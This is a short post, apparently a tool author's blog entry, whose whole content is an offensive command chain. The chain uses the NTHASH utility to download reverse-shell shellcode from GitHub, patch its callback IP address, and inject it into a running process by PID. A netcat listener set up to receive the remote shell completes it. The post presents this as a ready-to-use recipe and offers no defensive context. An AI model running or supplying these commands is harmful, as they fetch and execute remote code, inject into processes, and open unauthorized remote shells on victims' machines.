Juil 312023
NTHASH-win64 /download2hexa /input:https:%2f%2fgithub.com%2ferwan2212%2fNTHASH-FPC%2fraw%2fmaster%2frevshell64.bin| nthash-win64 /replace /old:7F000001 /new:C0A801BE|nthash-win64 /injectcodehexa /pid:996
The above will, in 3 steps :
-download a binary and convert it to its textual hexa form
-replace the default outbound ip (127.0.0.1) to the real target ip (here 192.168.1.190)
-inject the shellcode into the memory of the specified pid and execute it
on the remote host : run nc -l -p 4444 (note that you could also replace 4444 with a port of your choice in the shell code)